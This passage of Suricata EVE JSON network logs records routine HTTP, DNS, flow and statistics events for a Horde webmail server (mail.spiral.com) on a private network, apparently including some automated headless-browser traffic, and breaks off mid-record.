{"timestamp":"2020-02-29T00:19:53.134925+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:53.229605+0000","flow_id":231209601455855,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33684,"proto":"UDP","dns":{"type":"answer","id":17640,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:53.407533+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069}} 
{"timestamp":"2020-02-29T00:19:54.289397+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20245,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:54.318794+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/settings-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":535},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/settings-active.png","state":"CLOSED","stored":false,"size":535,"tx_id":6}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:54.400745+0000","flow_id":2148994103536245,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50516,"proto":"UDP","dns":{"type":"answer","id":20245,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:54.486048+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420}} {"timestamp":"2020-02-29T00:19:54.546998+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3420},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":7}} {"timestamp":"2020-02-29T00:19:54.551367+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237}} {"timestamp":"2020-02-29T00:19:54.554322+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prefs.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/js\/prefs.js","state":"CLOSED","stored":false,"size":318,"tx_id":8}} {"timestamp":"2020-02-29T00:19:54.597358+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106}} {"timestamp":"2020-02-29T00:19:55.763423+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34886,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":3}} {"timestamp":"2020-02-29T00:19:55.770899+0000","flow_id":787291901945212,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34888,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.000619+0000","flow_id":1633039675901026,"event_type":"flow","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":3051,"bytes_toclient":7364,"start":"2020-02-29T00:18:17.541794+0000","end":"2020-02-29T00:18:55.933107+0000","age":38,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:19:56.475426+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7069},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38217,"tx_id":0}} {"timestamp":"2020-02-29T00:19:56.485020+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64999,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:56.595891+0000","flow_id":1727159595722396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51027,"proto":"UDP","dns":{"type":"answer","id":64999,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:56.642413+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343}} {"timestamp":"2020-02-29T00:19:57.000487+0000","flow_id":2049226304089160,"event_type":"flow","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:18:51.093256+0000","end":"2020-02-29T00:18:56.301439+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:19:57.000707+0000","flow_id":1364947804081477,"event_type":"flow","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:55.970053+0000","end":"2020-02-29T00:14:56.074979+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:57.419022+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54456,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59908,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:57.527637+0000","flow_id":943259344790734,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54456,"proto":"UDP","dns":{"type":"answer","id":59908,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89}} 
{"timestamp":"2020-02-29T00:19:57.576511+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:19:58.719665+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47452,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:58.754771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":106},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button.png","state":"CLOSED","stored":false,"size":106,"tx_id":9}} 
{"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:58.830845+0000","flow_id":599515932326705,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46256,"proto":"UDP","dns":{"type":"answer","id":47452,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:58.896827+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359}} {"timestamp":"2020-02-29T00:19:58.927557+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4359},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20138,"tx_id":10}} 
{"timestamp":"2020-02-29T00:19:58.969268+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461}} {"timestamp":"2020-02-29T00:19:58.971477+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/identityselect.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":461},"app_proto":"http","fileinfo":{"filename":"\/js\/identityselect.js","state":"CLOSED","stored":false,"size":983,"tx_id":11}} {"timestamp":"2020-02-29T00:19:58.971771+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117}} 
{"timestamp":"2020-02-29T00:19:59.000281+0000","event_type":"stats","stats":{"uptime":14851,"capture":{"kernel_packets":137189,"kernel_drops":0},"decoder":{"pkts":137198,"bytes":94135989,"invalid":192,"ipv4":135655,"ipv6":10,"ethernet":137198,"raw":0,"null":0,"sll":0,"tcp":130176,"udp":5272,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2830,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2846,"synack":2837,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1867,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2413,"failed_udp":112},"tx":{"http":4783,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2495}},"flow_mgr":{"closed_pruned":2803,"new_pruned":17,"est_pruned":2466,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65532,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21167,"memcap_state":0,"memcap_global":0},"http":{"memuse":110192,"memcap":0}}} 
{"timestamp":"2020-02-29T00:20:01.647446+0000","flow_id":202995961277195,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34890,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=kNRoyzspsLUkqfA8aZJfxcp&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3343},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8574,"tx_id":1}} {"timestamp":"2020-02-29T00:20:02.578245+0000","flow_id":784388504545285,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34892,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:20:03.976837+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":12}} {"timestamp":"2020-02-29T00:20:04.468667+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62219,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:04.579983+0000","flow_id":811820461074107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53750,"proto":"UDP","dns":{"type":"answer","id":62219,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:05.093693+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} 
{"timestamp":"2020-02-29T00:20:05.103615+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382}} {"timestamp":"2020-02-29T00:20:05.261009+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4382},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:20:05.262166+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} 
{"timestamp":"2020-02-29T00:20:06.000228+0000","event_type":"stats","stats":{"uptime":14858,"capture":{"kernel_packets":137242,"kernel_drops":0},"decoder":{"pkts":137243,"bytes":94148933,"invalid":192,"ipv4":135700,"ipv6":10,"ethernet":137243,"raw":0,"null":0,"sll":0,"tcp":130215,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1868,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4788,"